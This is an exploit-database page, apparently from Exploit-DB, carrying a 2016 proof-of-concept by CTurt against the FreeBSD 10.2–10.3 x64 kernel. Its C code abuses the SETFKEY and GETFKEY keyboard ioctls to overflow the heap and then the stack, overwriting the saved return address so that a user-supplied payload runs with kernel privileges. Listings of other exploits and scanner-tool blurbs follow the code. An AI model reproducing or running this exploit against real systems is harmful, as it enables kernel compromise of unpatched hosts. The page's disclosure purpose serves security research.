Menu

Search for hundreds of thousands of exploits

"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)"

Author

Exploit author

CTurt

Platform

Exploit platform

freebsd_x86-64

Release date

Exploit published date

2016-05-29

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/kbio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/linker.h>

int (*kprintf)(const char *fmt, ...);
char *ostype;

uint64_t originalRip;
uint64_t originalRbp;

void *resolve(char *name) {
	struct kld_sym_lookup ksym;
	
	ksym.version = sizeof(ksym);
	ksym.symname = name;
	
	if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
		perror("kldsym");
		exit(1);
	}
	
	printf("  [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
	return (void *)ksym.symvalue;
}

void payload(void) {
	kprintf("  [+] Entered kernel payload\n");
	
	strcpy(ostype, "CTurt  ");
	
	__asm__ volatile("swapgs; sysret");
}

// Copy the stack onto the heap
void heapOverflow(int index, size_t size) {
	fkeyarg_t fkey;
	
	fkey.keynum = index;
	fkey.flen = size;
	memset(&fkey.keydef, 0, 16);
	
	ioctl(0, SETFKEY, &fkey);
}

// Copy the heap onto the stack
void stackOverflow(int index) {
	fkeyarg_t fkey;
	
	fkey.keynum = index;
	fkey.flen = 16;
	memset(&fkey.keydef, 0, 16);
	
	ioctl(0, GETFKEY, &fkey);
}

int main(void) {
	int result, i;
	fkeyarg_t fkey;
	
	uint32_t ripLower4 = 0x808312cd; // jmp rbp
	uint64_t rbp = (uint64_t)payload;
	
	
	kprintf = resolve("printf");
	ostype = resolve("ostype");
	
	
	printf("  [+] Set full length for key 10\n");
	fkey.keynum = 10;
	fkey.flen = 16;
	ioctl(0, SETFKEY, &fkey);
	
	
	printf("  [+] Set bad length and perform heap overflow\n");
	heapOverflow(0, 128 - offsetof(fkeyarg_t, keydef) + 8 + 0x30 + sizeof(ripLower4));
	
	
	printf("  [+] Prepare stack overflow memory\n");
	fkey.keynum = 10;
	fkey.flen = 16;
	ioctl(0, GETFKEY, &fkey);
	originalRbp = *(uint64_t *)((char *)&fkey.keydef + 4);
	originalRip = 0xffffffff00000000 | *(uint32_t *)((char *)&fkey.keydef + 12);
	
	printf("  [+] Original rip: %#lx\n", originalRip);
	printf("  [+] Original rbp: %#lx\n", originalRbp);
	
	*(uint64_t *)((char *)&fkey.keydef + 4) = rbp;
	*(uint32_t *)((char *)&fkey.keydef + 12) = ripLower4;
	ioctl(0, SETFKEY, &fkey);
	
	
	printf("  [+] Trigger stack overflow\n");
	fflush(stdout);
	
	stackOverflow(0);
	
	
	return 0;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2016-05-29 "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)" dos freebsd_x86-64 CTurt
2016-05-29 "FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)" dos freebsd_x86-64 CTurt
2016-03-16 "FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow" dos freebsd_x86-64 "Core Security"
Release Date Title Type Platform Author
2016-05-29 "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)" dos freebsd_x86-64 CTurt
2016-05-29 "FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)" dos freebsd_x86-64 CTurt 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected